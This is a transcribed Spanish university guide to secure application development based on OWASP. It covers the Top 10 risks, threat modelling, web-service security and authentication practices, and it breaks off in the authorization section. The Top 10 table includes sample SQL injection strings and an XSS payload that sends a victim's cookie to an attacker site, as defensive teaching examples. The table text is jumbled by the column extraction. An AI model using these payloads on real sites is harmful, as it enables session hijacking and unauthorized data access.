GUÍA DE SEGURIDAD PARA SISTEMAS DE INFORMACIÓN Basada en OWASP

Tamaño: px
Comenzar la demostración a partir de la página:

Download "GUÍA DE SEGURIDAD PARA SISTEMAS DE INFORMACIÓN Basada en OWASP"

Transcripción

1 A-RI-P01-G02 Versión : 01 Página 1 de 44 GUÍA DE SEGURIDAD PARA SISTEMAS DE INFORMACIÓN Basada en OWASP 1

2 A-RI-P01-G02 Versión : 01 Página 2 de 44 CONTENIDO INTRODUCCIÓN 4 1. OBJETIVO 4 2. ALCANCE 5 3. OWASP (The Open Web Application Security Project) 5 4. RIESGOS DE SEGURIDAD EN APLICACIONES LOS DIEZ RIESGOS MÁS CRÍTICOS EN LAS APLICACIONES WEB (OWASP TOP ) 5 5. DESARROLLO MODELADO DE RIESGO DE AMENAZA Identificar Objetivos de Seguridad Visión general de la aplicación Descomponer la aplicación Documentar las amenazas conocidas SERVICIOS WEB AUTENTICACIÓN Técnicas de autenticación Web comunes AUTORIZACIÓN MANEJO DE SESIONES VALIDACIÓN DE DATOS INTERPRETE DE INYECCIÓN MANEJO DE ERRORES, AUDITORIA Y GENERACIÓN DE LOGS DESBORDAMIENTO DE MEMORIA CONFIGURACIÓN ATAQUES DE DENEGACIÓN DE SERVICIO PRUEBAS QUÉ ES LA COMPROBACIÓN? CUÁNDO COMPROBAR? TÉCNICAS DE COMPROBACIÓN Inspecciones y Revisiones Manuales Modelado de Amenazas 32 2

3 A-RI-P01-G02 Versión : 01 Página 3 de Revisión de Código Pruebas de Intrusión ENTORNO DE PRUEBAS OWASP Antes de empezar el desarrollo Durante el diseño y definición Durante el desarrollo: Durante la implementación: Mantenimiento y operaciones: REVISIÓN DE CÓDIGO AUTENTICACIÓN AUTORIZACIÓN GESTIÓN DE COOKIES VALIDACIÓN DE ENTRADA DE DATOS GESTIÓN DE ERRORES / FUGA DE INFORMACIÓN LOG / AUDITORÍA CIFRADO DE DATOS ENTORNO DE CÓDIGO SEGURO GESTIÓN DE SESIONES (LOGIN / LOGOUT) 43 REFERENCIAS 44 3

4 A-RI-P01-G02 Versión : 01 Página 4 de 44 FECHA: Septiembre 15 de 2014 CLASIFICACIÓN: Uso Interno ELABORADO POR: Evelin Aidee Barón Huertas REVISADO POR Comité de Calidad Proceso Gestión de Recursos Informáticos. INTRODUCCIÓN Para asegurar que la seguridad de la información sea un componente integral del servicio Desarrollo de aplicaciones, es necesario incluir en el Procedimiento de Incorporación de Sistemas de Información(A-RI-P01), que hacen parte de los procedimientos del Proceso del Gestión de Recursos Informáticos, los cuales integran el sistema de gestión de la seguridad de la información y el Sistema de Gestión de Servicios de la Universidad Pedagógica y Tecnológica de Colombia, contempla la presente guía para tener en cuenta en el procedimiento nombrado y particularmente en el instructivo de desarrollo (A-RI- P01-I01) y la declaración de aplicabilidad Dominio A Requisitos de seguridad de los sistemas de información. El documento está dividido en siete partes fundamentales, en primer lugar se presenta el objetivo general de la presente guía, a continuación el alcance que tiene para su desarrollo. En tercer lugar se hace una pequeña introducción de lo que es OWASP, el proyecto en el cual está basado este documento. La cuarta parte hace referencia a los riesgos más comunes de las aplicaciones, teniendo en cuenta el Top 10 de OWASP. En quinta instancia se presenta de manera resumida la guía para construir aplicaciones y servicios web seguros de OWASP, guía para tener en cuenta en la fase de desarrollo y diseño de aplicaciones. En sexto lugar se presenta brevemente la guía de pruebas OWASP, guía que se recomienda mirar en detalle por el tester a la hora de estar haciendo pruebas sobre una aplicación. Finalmente, y teniendo en cuenta la guía para la revisión de código de OWASP, se presenta de manera general el contenido de dicha guía. 1. OBJETIVO Este documento sirve de apoyo para la construcción de aplicaciones seguras y confiables en el Grupo de Organización y Sistemas, busca delinear que la 4

5 A-RI-P01-G02 Versión : 01 Página 5 de 44 seguridad de la información esté integrada con los sistemas y se diseñe e implemente dentro del ciclo de vida del sistema. 2. ALCANCE Esta guía aplica al procedimiento de Incorporación de Sistemas de Información (A-RI-P01) del proceso de Gestión de Recursos Informáticos (A-RI), y específicamente al Instructivo para el desarrollo (A-RI-P01-I01). Y al dominio A Requisitos de Seguridad de los Sistemas de Información de la Declaración de Aplicabilidad. 3. OWASP (The Open Web Application Security Project) El Proyecto abierto de seguridad de aplicaciones web es una comunidad que busca facultar a las organizaciones a desarrollar, adquirir y mantener aplicaciones web seguras y confiables, brindando una serie de herramientas como libros, foros, guías entre otros, todos estos, gratuitos y abiertos para el interesado. Su único objetivo es asegurar el éxito de un sistema a largo plazo. 4. RIESGOS DE SEGURIDAD EN APLICACIONES. El riesgo es la posibilidad de que una amenaza se produzca, dando lugar a un ataque al sistema Todas las aplicaciones están expuestas a ataques es por esto que el software inseguro se convierte en un reto técnico que busca disminuir los riesgos y crear aplicaciones seguras que sean capaces de controlarlos LOS DIEZ RIESGOS MÁS CRÍTICOS EN LAS APLICACIONES WEB (OWASP TOP ) Los escenarios de amenazas para aplicaciones cambian constantemente, por eso OWASP presenta el top 10, de los riesgos de seguridad que puede sufrir una aplicación. Se presentan a continuación con el fin de que las personas que hacen parte del grupo de desarrollo identifiquen los riesgos más críticos a los que se ven enfrentados los sistemas que se desarrollan y los que están actualmente en producción y se tome conciencia acerca de la seguridad en las aplicaciones. 5

6 A-RI-P01-G02 Versión : 01 Página 6 de 44 Tabla 1. Top 10 OWASP LOS DIEZ RIESGOS MAS CRÍTICOS EN APLICACIONES WEB INYECCIÓN Definición Cómo descubrirlo? Cómo prevenirlo? Las fallas de Inyección, tales como SQL, OS, y LDAP, ocurren cuando datos no confiables son enviados a un intérprete como parte de un comando o consulta. Los datos hostiles del atacante pueden engañar al intérprete en ejecutar comandos no intencionados o acceder a datos no autorizados. Las funciones de autenticación y gestión de sesiones de las aplicaciones, son frecuentemente implementadas incorrectamente, permitiendo a los atacantes comprometer contraseñas, claves, token de sesiones, o explotar otras fallas de implementación para asumir la identidad de otros usuarios. La manera de averiguar si la aplicación es vulnerable a inyecciones es verificar que en todo uso de intérpretes se separa la información no confiable del comando o consulta. Esto se hace verificando el código para ver si la aplicación usa intérpretes de manera segura. Existen herramientas de análisis de código que ayudan a ver como se utilizan los intérpretes y seguir el flujo de datos a través de la aplicación. Los testers pueden validar estos problemas al crear pruebas que confirmen la vulnerabilidad Impacto Para evitar las inyecciones se requiere mantener los datos no confiables separados de los comandos y consultas. Para esto OWASP sugiere tres opciones: - Usar una API segura que evite el uso de intérpretes o provea una interface parametrizada. -Si no está disponible una API parametrizada, debe codificar cuidadosamente los caracteres especiales. -Validar las entradas positivas o de lista blanca, pero no es una defensa integral Ejemplo Una inyección puede causar pérdida o corrupción de datos, perdida Escenario #1: La aplicación usa datos no confiables en la construcción de responsabilidad, o negación de acceso. Algunas veces, una de la siguiente instrucción SQL vulnerable: inyección puede llevar al compromiso total del servidor. String query="select * FROM accounts WHERE custid='"+request.getparameter("id") +"'"; El atacante puede modificar el parámetro id en su Navegador para enviar: 'or '1'='1. Por ejemplo: hvp://example.com/app/accountview?id=' or '1'='1 PÉRDIDA DE AUTENTICACIÓN Y GESTIÓN DE SESIONES Definición Cómo descubrirlo? Cómo prevenirlo? Los activos de gestión de sesiones como credenciales e identificadores de sesión pueden ser vulnerables si: -Las credenciales no están protegidas cuando se almacenan utilizando un hash o cifrado. -Se pueden adivinar o sobrescribir las credenciales a través de funciones débiles de gestión de la sesión. -Los ID de sesión son expuestos en la URL Impacto Este tipo de vulnerabilidades puede permitir que algunas o todas las cuentas sean atacadas. Una vez que el ataque resulte exitoso, el Se debe facilitar a los desarrolladores un único conjunto de controles de autenticación y gestión de sesiones fuerte. Estos controles deberán conseguir: -Cumplir con todos los requisitos de autenticación y control de sesiones. -Tener una interfaz simple para los desarrolladores Ejemplo Aplicación de reserva de vuelos que soporta re escritura de URL poniendo los ID de sesión en la propia dirección:

7 A-RI-P01-G02 Versión : 01 Página 7 de 44 Las fallas XSS ocurren cada vez que una aplicación toma datos no confiables y los envía al navegador web sin una validación y codificación apropiada. XSS permite a los atacantes ejecutar secuencia de comandos en el navegador de la víctima los cuales pueden secuestrar las sesiones de usuario, destruir sitios web, o dirigir al usuario a un sitio malicioso. atacante podrá realizar cualquier acción. Las cuentas privilegiadas hvp://example.com/sale/ son objetivos prioritarios. saleitems;jsessionid=2p0oc2jdpxm0oqsndlpskhcjun2jv? dest=hawaii Un usuario autentificado en el sitio quiere mostrar la oferta a sus amigos. Envía por correo electrónico el enlace anterior, sin ser consciente de que está proporcionando su ID de sesión. Cuando sus amigos utilicen el enlace utilizaran su sesión y su tarjeta de crédito. SECUENCIA DE COMANDOS EN SITIOS CRUZADOS (XSS) Definición Cómo descubrirlo? Cómo prevenirlo? La aplicación es vulnerable a este tipo de riesgo si no se asegura que todas las entradas de datos ingresadas por el usuario son codificadas adecuadamente, o si no se verifica que los datos al momento de ingreso sean seguros antes de ser incluidos en la página de salida. Haciendo uso de herramientas automatizadas Una referencia directa a objetos ocurre cuando un desarrollador Prevenir XSS requiere mantener los datos no confiables separados del contenido activo en el navegador. OWASP recomienda: -Codificar los datos no confiables basados en el contexto HTML donde serán ubicados. -Validación de entradas positiva o de lista blanca, esta validación debe tener en cuenta los caracteres, el formato y reglas de negocio que debe cumplir el dato. -Considerar utilizar políticas de seguridad de contenido (CSP) para defender contra XSS todo el sitio. Impacto Ejemplo El atacante puede ejecutar secuencia de comandos en el navegador La aplicación utiliza datos no confiables en la construcción del siguiente de la víctima para secuestrar las sesiones de usuario, alterar la código HTML sin validarlos o codificarlos: apariencia del sitio web, insertar código hostil, redirigir usuarios, (String) page += "<input name='creditcard' type='text value='"+ secuestrar el navegador de la víctima utilizando malware, etc. request.getparameter("cc") +"'>"; El atacante modifica el parámetro CC en el navegador: '><script>document.locacon= ' bin/cookie.cgi? foo='+document.cookie</script>' Esto causa que el identificador de sesión de la víctima sea enviado al sitio web del atacante, permitiendo al atacante cambiar la sesión del usuario. REFERENCIA DIRECTA INSEGURA A OBJETOS Definición Cómo descubrirlo? Cómo prevenirlo? Verificar que todas las referencias a objetos tienen las protecciones apropiadas. Para conseguirlo OWASP considera: Es necesario seleccionar una forma de proteger los objetos accesibles por cada usuario.

8 A-RI-P01-G02 Versión : 01 Página 8 de 44 expone una referencia a un objeto de implementación interno, tal como un fichero, directorio o base de datos. Los atacantes pueden manipular estas referencias para acceder a datos no autorizados, sin un chequeo de control de acceso u otra protección. -Para referencias directas a recursos restringidos, la aplicación necesitaría verificar si el usuario está autorizado a acceder al recurso en concreto que solicita. -Si la referencia es una referencia indirecta, la correspondencia con la referencia directa debe ser limitada a valores autorizados para el usuario en concreto Impacto -Utilizar referencias indirectas por usuario o sesión. Esto evitaría que los atacantes accedieran directamente a recursos no autorizados. -Comprobar el acceso. Cada uso de una referencia directa a un objeto de una fuente que no es de confianza debe incluir una comprobación de control de acceso para asegurar que el usuario está autorizado a acceder a objetos solicitados. Ejemplo Este riesgo puede comprometer toda la información que pueda ser La aplicación utiliza datos no verificados en una llamada SQL que referida por parámetros. A menos que el espacio de nombres resulte accede a la información sobre la cuenta: escaso, para un atacante resulta sencillo acceder a todos los datos String query ="SELECT * FROM accts WHERE account =?"; disponibles de ese tipo. PreparedStatement pstmt = conneccon.preparestatement(query, ); pstmt.setstring(1, request.getparameter("acct")); ResultSet results =pstmt.executequery(); Si el atacante modifica el parámetro acct en su navegador para enviar cualquier número de cuenta que quiera. Si esta acción no se verifica, el atacante podría acceder a cualquier cuenta de usuario, en vez de a su cuenta de cliente correspondiente. hvp://example.com/app/accountinfo?acct=notmyacct CONFIGURACIÓN DE SEGURIDAD INCORRECTA Definición Cómo descubrirlo? Cómo prevenirlo? Analizar si la aplicación cuenta con el apropiado fortalecimiento en seguridad a través de todas las capas que la componen incluso: -Software actualizados( Servidores, DBMS, aplicaciones, librerías) -Características instaladas o habilitadas innecesariamente -Cuentas por defecto y contraseñas habilitadas sin cambiar -Información y manejo de errores Tener definida e implementada una configuración segura para la aplicación, marcos de trabajo, servidor de aplicaciones, servidor web, base de datos y plataforma, significa que se cuenta con una seguridad buena. Todas esas configuraciones deben estar definidas, implementadas y mantenidas, debido a que por lo general no son seguras por defecto. Esto incluye mantener todo el software actualizado, incluidas las librerías de código Impacto Frecuentemente esta vulnerabilidad da a los atacantes acceso no autorizado a algunas funcionalidades o datos del sistema. Ocasionalmente provocan que el sistema se comprometa totalmente. OWASP recomienda establecer lo siguiente: -Un proceso rápido, fácil y repetible de fortalecimiento, para obtener un entorno apropiadamente asegurado. -Un proceso para mantener y desplegar las nuevas actualizaciones y parches de software para cada entorno. -Una arquitectura fuerte de aplicación. -Considerar ejecutar escaneos y auditorias periódicamente. Ejemplo La consola de administrador del servidor de aplicaciones se instaló automáticamente y no se ha eliminado. Las cuentas por defecto no se han modificado. El atacante descubre las páginas por defecto de administración y se conecta con las contraseñas por defecto.

9 A-RI-P01-G02 Versión : 01 Página 9 de 44 utilizadas por la aplicación. EXPOSICIÓN DE DATOS SENSIBLES Definición Cómo descubrirlo? Cómo prevenirlo? Se debe determinar el conjunto de datos sensibles que requieran protección extra, como contraseñas, información personal etc. Para estos datos OWASP plantea las siguientes preguntas: - Se almacena en texto claro a largo plazo, incluyendo sus respaldos? - Se transmite en texto claro, interna o externamente? - Se utiliza algún algoritmo criptográfico débil/antiguo? - Se utilizan tanto cabezales como directivas de seguridad del navegador cuando son enviados o provistos por el mismo? Se refiere a la protección incorrecta de datos críticos tales como credenciales de autenticación. Muchas aplicaciones no protegen adecuadamente este tipo de datos sensibles. Los atacantes pueden usar dichos datos para llevar a cabo fraudes, robos de identidad u otros delitos. La mayoría de aplicaciones verifican los derechos de acceso a nivel de función antes de hacer visible en la misma interfaz de usuario. Este riesgo corresponde a la falta de controles desde el servidor, permitiendo a un posible atacante acceder a funciones a las que no debería Para los datos sensibles se recomienda como minimo lo siguiente: -Considerar las amenazas de las cuales proteger los datos -No almacenar datos sensibles innecesariamente -Asegurarse de aplicar algoritmos fuertes de cifrado y estándares como claves fuertes -Deshabilitar el autocompletar en los formularios que recolecten datos sensibles Impacto Ejemplo Los fallos frecuentemente comprometen todos los datos que Una aplicación cifra los números de tarjetas de crédito en una base de deberían estar protegidos. Típicamente, esta información incluye datos utilizando cifrado automático de la base de datos. Esto significa datos sensibles. que también se descifra automáticamente cuando se recuperan, permitiendo por medio de una inyección de SQL recuperar números de tarjetas de texto claro. El sistema deberia cifrar dichos números. AUSENCIA DE CONTROL DE ACCESO A FUNCIONES Definición Cómo descubrirlo? Cómo prevenirlo? La manera de descubrir si una aplicación falla en restringir adecuadamente el acceso a nivel de funcionalidades es verificar cada funcionalidad de la aplicación como: - La interfaz de usuario muestra la navegación hacia funcionalidades no autorizadas? - Existe autenticación del lado del servidor, o se han perdido las comprobaciones de autorización? - Los controles del lado del servidor se basan exclusivamente en la información proporcionada por el atacante? Impacto Estas vulnerabilidades permiten el acceso no autorizado de los atacantes a funciones del sistema. Las funciones administrativas son un objetivo clave de este tipo de ataques. Las aplicaciones deberían tener un módulo de autorización consistente y fácil de analizar, invocado desde todas las funciones del negocio -El proceso para gestión de accesos y permisos debería ser actualizable y auditable fácilmente. -La implementación del mecanismo debería negar todo acceso por defecto. -Si la función forma parte de un workflow, verifique y asegúrese que las condiciones de flujo se encuentren en el estado apropiado Ejemplo El atacante forza la navegación hacia las URLs objetivo. La siguiente URL requiere autenticación. Los derechos de administrador también son requeridos para el acceso a la página admin_getappinfo hvp://example.com/app/getappinfo

10 A-RI-P01-G02 Versión : 01 Página 10 de 44 Un ataque CSRF obliga al navegador de una víctima autenticada a enviar una petición HTTP falsificada, incluyendo la sesion del usuario y cualquier otra información incluida automáticamente a una aplicación web vulnerable. Esto le permite a un atacante generar peticiones sobre una aplicación vulnerable sin la autorización apropiada. hvp://example.com/app/admin_getappinfo Si un usuario no autenticado puede acceder a ambas páginas, eso es una vulnerabilidad. Si un usuario autenticado, no administrador puede acceder a admin_getappinfo se considera una vulnerabilidad FALSIFICACIÓN DE PETICIONES EN SITIOS CRUZADOS (CSRF) Definición Cómo descubrirlo? Cómo prevenirlo? Para conocer si una aplicación es vulnerable, verifique la ausencia de un token impredecible en cada enlace y formulario. En dicho caso, un atacante puede falsificar peticiones maliciosas. Se debe centrar en los enlaces y formularios que invoquen funciones que permitan cambios de estados, debido a que estos son los objetivos más importantes del CSRF. También verificar las operaciones de múltiples pasos, porque no son inmunes a este tipo de ataques. Corresponde a la explotación de librerías, frameworks y otros componentes, que funcionan casi siempre con todos los privilegios, por esto son vulnerables por parte de un atacante con el fin de obtener acceso o combinar con otros ataques Impacto Los atacantes pueden cambiar cualquier dato que la víctima este autorizada a cambiar o a cualquier funcionalidad donde este autorizada, incluyendo registro, cambios de estado o cierre de sesión. Por lo general su prevención requiere la inclusión de un token no predecible en cada solicitud HTTP. Estos deben ser únicos por cada sesión de usuarios. La opción que se recomienda es incluir un token único en un campo oculto, pero también puede ser incluido en la propia URL, o parámetro de la misma. Ejemplo La aplicación permite al usuario enviar una petición de cambio de estado no incluya nada secreto. Por ejemplo: hvp://example.com/app/transferfunds? amount=1500&descnaconaccount= De esta forma, el atacante construye una petición que transferirá el Dinero de la cuenta de la víctima hacia su cuenta. USO DE COMPONENTES CON VULNERABILIDADES CONOCIDAS Definición Cómo descubrirlo? Cómo prevenirlo? Para determinar si existe vulnerabilidad se necesita buscar en las bases de datos, así como también mantenerse al tanto de la lista de correos del proyecto y anuncios de cualquier cosa que pueda ser vulnerable, si uno de los componentes tiene vulnerabilidad, se debe evaluar cuidadosamente si es o no vulnerable revisando si su código utiliza la parte del componente vulnerable y si el fallo puede tener un impacto considerable. Impacto El rango completo de debilidades incluye inyección, control de acceso roto, XSS, etc. El impacto puede ser desde mínimo hasta apoderamiento completo del equipo y compromiso de los datos. No usar componentes que no ha codificado. Los proyectos de software deberían tener un proceso para: -Identificar todos los componentes y la versión que se esta utilizando. -Revisar la seguridad del componente en base de datos publicas -Establecer políticas de seguridad que regulen el uso de componentes. -Agregar capas de seguridad alrededor del componente. Ejemplo Los componentes vulnerables pueden causas riesgos inimaginables, desde trivial a malware sofisticado diseñado para un objetivo especifico. Casi siempre los componentes tienen todos los privilegios de la aplicación, por esto cualquier falla en un componente puede dar

11 A-RI-P01-G02 Versión : 01 Página 11 de 44 Frecuentemente las aplicaciones web redirigen y reenvían a los usuarios hacia otras páginas o sitios web utilizando datos no confiables para determinar la página de destino. Es allí donde los atacantes aprovechan para redirigir a las víctimas a sitios de phishing o que contengan malware problemas. REDIRECCIONES Y REENVÍOS NO VALIDADOS Definición Cómo descubrirlo? Cómo prevenirlo? La forma de determinar si una aplicación dispone de redirecciones y re-envíos no validados es: -Revisar el código para detectar el uso de redirecciones y reenvíos. -Recorrer la aplicación para observar si genera cualquier redirección -Se deben analizar todos los parámetros, si el código no se encuentra disponible. -Validar campos, y autorización del usuario Impacto Estas redirecciones pueden intentar instalar código malicioso o engañar a las víctimas para que revelen contraseñas u otra información sensible. El uso de reenvíos inseguros puede permitir evadir el control de acceso. Para hacer un uso seguro de redirecciones y reenvíos OWASP recomienda. -Evitar su uso -No involucrar parámetros manipulables por el usuario para definir el destino Ejemplo La aplicación tiene una página llamada redirect.jsp que recibe un único parámetro llamado url. El atacante compone una URL maliciosa que redirige a los usuarios a una aplicación que realiza phishing e instala código malicioso. hvp://

12 A-RI-P01-G02 Versión : 01 Página 12 de DESARROLLO OWASP proporciona Una guía para construir aplicaciones y servicios web seguros orientada a desarrolladores, la cual ofrece claves de las normas COBIT y parte de la norma ISO 17799, y se presenta de manera breve a continuación MODELADO DE RIESGO DE AMENAZA OWASP propone el método más importante de mitigación en el desarrollo de aplicaciones Web denominado Riesgo de Amenazas. Si se analiza detenidamente y se seleccionan los controles a través del modelado de riesgo de amenazas, el resultado final será una implementación de sistemas que demuestran reducción de los riesgos de negocio, de fraudes y pérdidas y adicionalmente un aumento de la seguridad. Durante el diseño de su aplicación, es esencial que la diseñe utilizando controles evaluados de riesgo de amenaza. OWASP recomienda el modelado de amenaza de Microsoft, el cual propone cinco pasos (Figura 1) en el proceso de modelado que se explican a continuación. Figura 1. Flujo del Modelo de Amenaza Fuente: OWASP, Una Guía para Construir Aplicaciones y Servicios Web Seguros Identificar Objetivos de Seguridad. El líder del proceso en coordinación con el equipo de desarrollo necesita entender los probables objetivos de seguridad. Los objetivos de seguridad en aplicaciones necesitan ser divididos en: 12

13 A-RI-P01-G02 Versión : 01 Página 13 de 44 Identidad Reputación Financiero Privacidad Disponibilidad de garantías Lo anterior da una idea de algunas de las decisiones de riesgo de negocio que lleva a la construcción de controles técnicos. También se puede orientar por: Leyes Regulaciones Estándares (como ISO 17799) Acuerdos Legales Políticas de Seguridad de la información Visión general de la aplicación Después de definir los objetivos, la aplicación deberá ser analizada para determinar: Componentes, flujos de datos, límites de confianza, etc. Para esta actividad se debe basar en la documentación de arquitectura y diseño Descomponer la aplicación Una vez que la arquitectura de la aplicación es entendida, la aplicación necesita ser descompuesta, esto significa que las características y módulos que tienen un impacto de seguridad necesitan ser descompuestas Documentar las amenazas conocidas En esta actividad se debe concentrar en los riesgos que son conocidos, que pueden ser fácilmente demostrados utilizando herramientas o el seguimiento de errores. Cuando documente una amenaza, Microsoft sugiere dos enfoques diferentes. Uno es un gráfico de amenaza y el otro es simplemente una lista estructurada SERVICIOS WEB En esta sección OWASP detalla los problemas comunes que los desarrolladores encaran y los métodos para resolver esos problemas. Los servicios Web se ven como aplicaciones web especializadas que difieren principalmente en la capa de presentación. Mientras que las aplicaciones web son típicamente basadas en HTML, los servicios web son basados en XML. Los servicios Web típicamente representan una interfaz pública funcional, que se llama de forma programática, mientras que las aplicaciones Web tienden a lidiar con un conjunto de características más rico y son dirigidas al contenido en la mayoría de las veces. 13

14 A-RI-P01-G02 Versión : 01 Página 14 de 44 Asegurando los servicios Web: Los servicios Web, como otras aplicaciones distribuidas, requieren protección en múltiples niveles. Estas tareas son a nivel de infraestructura, teóricamente lo debe hacer el administrador del sistema. Seguridad en la comunicación: las fallas más comunes que se pueden presentar cuando se usa un canal seguro son: Solo provee seguridad punto a punto Problemas de almacenamiento Falta de interoperabilidad Pasando las credenciales: Para establecer el intercambio de credenciales y la autenticación en servicios web los desarrolladores deben resolver: Dado que los mensajes de SOAP son basados en XML, todas las credenciales que se pasen deben ser convertidas a formato texto. Pasar las credenciales conlleva un riesgo inherente a su descubrimiento, ya sea por olerlos mientras están siendo transmitidos en la red o al analizar los registros de eventos del servidor Asegurarse de la frecura del mensaje: Las medidas usuales para protegerse contra mensajes re enviados son usar identificadores únicos en los mensajes y llevar registro de los procesados o usar un tiempo de validez relativamente corto Proteger la integridad del mensaje: Cuando un mensaje es recibido por un servicio Web, debe siempre preguntarse 2 cosas: confiar en el emisor, confiar en el mensaje creado. El servidor debe asegurarse que el mensaje que está viendo fue, de hecho, enviado por el emisor y que no fue alterado en el camino Protegiendo la confidencialidad del mensaje: Frecuentemente, no es suficiente con asegurar la integridad, en muchos casos también es deseable que nadie pueda ver los datos que son pasados y/o almacenados localmente. En cualquier caso, algún tipo de cifrado es requerido para encubrir el contenido Control de acceso: Después de que el mensaje ha sido recibido y validado exitosamente, el servidor debe: Saber quién está pidiendo la operación (Identificación) Confía en la identidad que el emisor dice tener (Autentificación) Permitirá al emisor realizar esta operación (Autorización) Auditoria: Una tarea común, típicamente requerida para las auditorias, es reconstruir la cadena de eventos que llevó a un problema en particular. Usualmente, esto se logra al guardar registro de eventos en el servidor en una ubicación segura, disponible solo para los administradores de TI y los auditores de sistema, para crear lo que comúnmente se conoce como un rastro de auditoria. Los servicios web no son excepción a esta práctica. 14

15 A-RI-P01-G02 Versión : 01 Página 15 de AUTENTICACIÓN El objetivo de la autenticación según OWASP es proveer servicios de autenticación segura a las aplicaciones Web, mediante: Vincular una unidad del sistema a un usuario individual mediante el uso de una credencial Proveer controles de autenticación razonables de acuerdo al riesgo de la aplicación. Denegar el acceso a atacantes que usan varios métodos para atacar el sistema de autenticación. OWASP presenta en su guía las mejores prácticas en cuanto a la seguridad en la autenticación: La autenticación es solo tan fuerte como sus procesos de administración de usuarios Use la forma más apropiada de autenticación adecuada para su clasificación de bienes Re-autenticar al usuario para transacciones de alto valor y acceso a áreas protegidas Autenticar la transacción, no el usuario Las contraseñas son trivialmente rotas y no son adecuadas para sistemas de alto valor Técnicas de autenticación Web comunes Autenticación básica y segura (Digest): Casi todos los servidores Web y de aplicación soportan el uso de autenticación básica y digest. Esto requiere que el explorador Web presente un cuadro de diálogo para obtener el nombre de usuario y contraseña, y enviarlos al servidor Web, el cual la procesará contra su propia base de datos de usuario, o en el caso de IIS, con Active Directory. La razón principal en contra del uso de autenticación básica o digest es debido a: Transmisión insegura de credenciales Ambas formas de autenticación sufren de ataques de replay y man-inthe-middle Ambas requieren SSL para proporcionar alguna forma de confidencialidad e integridad No proporciona una gran cantidad de control a la aplicación final. 15

16 A-RI-P01-G02 Versión : 01 Página 16 de 44 Autenticación basada en formas: La autenticación basada en formas provee al diseñador de la aplicación Web el mayor control sobre la interfaz de usuario, y de ahí que es ampliamente usada. La autenticación basada en formas requiere que la aplicación haga una buena cantidad de trabajo para implementar autenticación y autorización. Si es posible, si elige usar autenticación basada en formas, trate de re-usar un componente de control de acceso confiable en lugar de escribir el suyo. La autenticación basada en formas sufre de: Ataques de replay Ataques de man-in-the-middle Credenciales en texto claro Ataques de engaño (luring) Controles de contraseñas débiles Autenticación integrada: La autenticación integrada es más comúnmente vista en aplicaciones de Intranet usando el servidor Web Microsoft IIS y aplicaciones ASP.NET. La mayoría de los demás servidores Web no ofrecen esta alternativa. Si está desarrollando una aplicación para Intranet y su entorno de desarrollo soporta autenticación integrada, debería usarla. Significa menos trabajo para usted para desarrollar controles de autenticación y autorización, una credencial menos para que recuerden los usuarios, y puede re-utilizar infraestructura de autenticación y autorización pre-existente. Autenticación basada en certificado: La autenticación basada en certificado es ampliamente implementada en muchos servidores Web y de aplicación. El sitio Web expide certificados (o intenta confiar en certificados emitidos externamente). Los certificados públicos son cargados en la base de datos de autenticación del servidor, y comparados con las sesiones entrantes del navegador. Si los certificados coinciden, el usuario es autenticado. Hay algunos inconvenientes para el acceso basado en certificado: Muchos usuarios comparten las PC s y necesitan traer sus certificados con ellos. La administración de certificados en un navegador no es trivial en muchos casos La revocación certificados con certificados auto emitidos es casi imposible en ambientes de extranet Confiar en certificados privados de servidores requiere las decisiones de confianza del usuario final. El costo de los certificados y su parte en el modelo de negocio de compañías de certificados públicas no está relacionado con el costo de la prestación. Autenticación fuerte: La autenticación fuerte (como tokens,certificados, etc) proporciona un nivel más alto de seguridad que nombres de usuario y 16

17 A-RI-P01-G02 Versión : 01 Página 17 de 44 contraseñas. La forma generalizada de autenticación fuerte es algo que sabes, algo que tienes. Por lo tanto, cualquier cosa que requiera un secreto (el algo que sabes ) y autenticador como un token, llave USB, o certificado (el algo que tienes ) es un control más fuerte que nombres de usuario y contraseñas (que es solo algo que sabes ) o biométricos ( algo que eres ). El navegador recuerda contraseñas: Los navegadores modernos ofrecen la habilidad de administrar la multitud de credenciales almacenándolas de forma insegura en la computadora. Para evitarlo envíe lo siguiente en cualquier campo de entrada sensitivo, como nombres de usuario, contraseñas, re-validación de contraseñas, tarjetas de crédito y campos CCV, etc: <form AUTOCOMPLETE="off"> - para todos los campos de la forma <input AUTOCOMPLETE="off"> - para solo un campo Esto le indica a la mayoría de los navegadores que no almacenen ese campo en la característica de administración de contraseñas. Elección de nombres de usuario: Si elige un esquena de nombres de usuario que es predecible, es probable que los atacantes puedan realizar una negación de servicio en contra suya. Para protegerse cuando sea posible, permita al usuario a crear su propio nombre de usuario. Los nombres de usuario tienen que ser únicos. Cambio de contraseñas: Cuando el usuario tiene que recordar una parte de la credencial, a veces es necesario cambiarla, por ejemplo si la contraseña es accidentalmente divulgada a un tercero o el usuario siente que es tiempo de cambiar la contraseña. Para protegerse de esta vulnerabilidad debe Asegure que su aplicación tiene una función para cambiar contraseña. La forma debe incluir la contraseña anterior, la contraseña nueva y la confirmación de la nueva contraseña Use AUTOCOMPLETE=off para prevenir que los navegadores guarden la contraseña localmente Si el usuario ingresa incorrectamente la contraseña anterior varias veces, bloquee la cuenta y elimine la sesión Contraseñas cortas: Las contraseñas pueden ser obtenidas por fuerza bruta, rainbow cracked (ataques de diccionario pre-computados), o fallar a simples ataques de diccionario. Desafortunadamente, también son el método principal de ingresar usuarios a aplicaciones con todo tipo de riesgos, para protegerse debe. Asegure que su aplicación no permita contraseñas en blanco Imponga una longitud de contraseña mínima. Aliente a los usuarios a usar frases clave grandes 17

18 A-RI-P01-G02 Versión : 01 Página 18 de 44 Asegure que su aplicación permita frases clave arbitrariamente grandes usando un algoritmo decente de cifrado de una vía, como AES-128 o SHA-256. Cifrado de contraseñas reversible: Las contraseñas son secretas. No hay razón para descifrarlas baja ninguna circunstancia. El equipo de soporta debe ser capaz de establecer nuevas contraseñas (con una pista de auditoría, obviamente), no leer viejas contraseñas. Por lo tanto, no hay razón para almacenar contraseñas en una forma reversible. para protegerse debe comprender la criptografía detrás del cifrado de contraseñas. Restablecimiento automático de contraseñas: Los mecanismos de restablecimiento automático de contraseñas son comunes cuando las organizaciones creen que necesitan evitar altos costos de soporte de la autenticación. Desde la perspectiva de la administración de riesgos la funcionalidad de restablecimiento de contraseñas parece aceptable en muchas circunstancias. Sin embargo, la funcionalidad de restablecimiento de contraseñas equivale a un mecanismo secundario mucho más débil. Para evitar esta vulnerabilidad se debe ser cuidadoso cuando se implemente el restablecimiento automático de contraseñas, enviando al usuario un correo, para que quede rastro de auditoria. Salir: Todas las aplicaciones deben tener un método para salir de la aplicación. Esto es fundamental para aplicaciones que contengan datos privados e importantes AUTORIZACIÓN Los objetivos de la autorización son: Asegurar que únicamente usuarios autorizados puedan realizar 